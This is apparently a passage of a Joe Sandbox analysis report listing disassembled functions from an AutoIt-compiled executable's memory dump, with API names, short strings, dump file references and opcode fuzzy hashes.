                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf
                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                            • API String ID: 3988819677-2584243854
                                                            • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                            • Instruction ID: db6b45b33ce3ba342eafc1de70874ced4ed0645e3ebc6e58c8b63c24a15fbba1
                                                            • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                            • Instruction Fuzzy Hash: 0D3186BAB08B02C5EB24EB64F4512ECA361FB45784B804037CA1E17B59CF38E40AD362
                                                            Function 00007FF7EC15DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                            • Instruction ID: 23f5ff62591c2032b3856a4363c0df69ae3809993e1968dc841de6f21b75cca2
                                                            • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                            • Instruction Fuzzy Hash: DB21F7A6A0864241EB60BB2DA5902B9A650EB85774FA4033BD76F037D4DE7DD881D322
                                                            Function 00007FF7EC1CA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                            • Instruction ID: 104f91670b2d066181aee7d1b904dd2c8ff07e3918b6b49fef7e7e7d4a1f09a5
                                                            • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                            • Instruction Fuzzy Hash: D7314B76A08781CBD324DF29F440B5AB7A5F788790F50423AEB9943B98CB38E851CF11
                                                            Function 00007FF7EC1C9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                            • Instruction ID: 6f9088e1e3fad689582d749f906cdac2b367778a4caa6483c3baf5cd5e080d9e
                                                            • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                            • Instruction Fuzzy Hash: 0D314B7AA08B81CAE770DB15F444B5AB7A1F784790F544236EAAC43B98CB3CD881CF15
                                                            Function 00007FF7EC15FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$pow
                                                            • API String ID: 1757819995-713443511
                                                            • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                            • Instruction ID: ad8dacdb2eb9e47302f05febd5e4e5e2dd3368e2d9f36821c759b61b7dec6f2c
                                                            • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                            • Instruction Fuzzy Hash: AD218AB6D18AC483E370DF14F04476AEAA1FBDA344F601326F38906A45CBBCD085CB01
                                                            Function 00007FF7EC18DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                            • Instruction ID: 58a48d70e924f505784c0fb4b0ca5f2e3aefa93b0158ef04aa693537c8f41a6d
                                                            • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                            • Instruction Fuzzy Hash: 0E112BAAA08B8181F610FB11E4412EDA7A1FF85BA0FC44232DAAC077D9DF3CD115C722
                                                            Function 00007FF7EC1AE708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                            • Instruction ID: 2270db59b9dd7785d58f65898fdc1cae8509778ec22f27645d4c5c0283ad929e
                                                            • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                            • Instruction Fuzzy Hash: 4611B67AA1C64182E7509B51F0003B9B261EB80B48FE84036DA4906698CF3DD892CB51
                                                            Function 00007FF7EC18DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                            • Instruction ID: ca6257c3e421b42065d29e5b36339d7df6436b0991b1255f18f7258fb8fabd99
                                                            • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                            • Instruction Fuzzy Hash: E41193AAA0C78291FA14F710F1513E99751BF85780F844132D69D0768ADE3CD215CB12
                                                            Function 00007FF7EC18DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                            • Instruction ID: d9591094d3fa68dcfc73adb4317910b5fc0121c40c1db52a6d48a4470268a9b6
                                                            • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                            • Instruction Fuzzy Hash: E31193AAA0C78291FA14FB10F1512E9A760FF89780FC44132D68C0768ADF3CD619CB22
                                                            Function 00007FF7EC1CFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-3916222277
                                                            • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                            • Instruction ID: 0b00c2d039877bc4369f57b7a8eb7253b5a3946c745e236139da2525ee1c6fa8
                                                            • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                            • Instruction Fuzzy Hash: C2117076A08B418AE710EF16F80076AF6E6FB84784F848136EA4D47B69CF3DD090CB11
                                                            Function 00007FF7EC18DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                            • Instruction ID: c330c876c5c575ff75dd57722a3356db2525e550157ce95c3ad15648e192a621
                                                            • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                            • Instruction Fuzzy Hash: AE01A5AAA1C64291EA24F714F1513F9D361FF85394FC04132E59D07A8ADE3CD219DB22
                                                            Function 00007FF7EC1615B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$tan
                                                            • API String ID: 3384550415-2428968949
                                                            • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                            • Instruction ID: 9cb901ae48280f6bce799807d4e6e63a0948f489e22caf83b984b53491ba87dc
                                                            • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                            • Instruction Fuzzy Hash: AB018476A28B8586DA14DF12A40033AA152BB9A7D4F605335FA5E0BB88EF7CD1508B01
                                                            Function 00007FF7EC18C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 2030045667-4017498283
                                                            • Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                            • Instruction ID: f39c1cc5a4a9671d4a4cf4fc7ab5fb94276fa558fbbf75460ecf61cb3536f85d
                                                            • Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                            • Instruction Fuzzy Hash: E1F0A0A8B1824682EB287351B1513B9A251AF487C1FD45433DA0D0BBDADDBCD491C722
                                                            Function 00007FF7EC1475C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7EC1475E9
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF7EC147241,?,?,?,?,00007FF7EC14660C,?,?,?,?,00007FF7EC144CD3), ref: 00007FF7EC147600
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                            • Instruction ID: 45e8194e5145cfa581c6eb17c3942d2dbcee45477ff2cd06df4cf0a2ad25afcf
                                                            • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                            • Instruction Fuzzy Hash: 20E065E9A0864381FA45AB55F4006F8A772BF48B92FD84433D90D06259DE3CE485C662
                                                            Function 00007FF7EC145620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7EC145629
                                                            • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7EC14563A
                                                              • Part of subcall function 00007FF7EC147018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC14563F), ref: 00007FF7EC14708D
                                                              • Part of subcall function 00007FF7EC147018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7EC14563F), ref: 00007FF7EC1470BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                            • String ID: Unknown exception
                                                            • API String ID: 3561508498-410509341
                                                            • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction ID: e777dd9f60a738b2a3f259cc3e2f120aa3d4ebefc6b802ff13c6aa4de12b580e
                                                            • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction Fuzzy Hash: 30D05B6A614645D1DE10FB04E4413A4E334F75030DFD04433D14C465B5EF3CD64AD751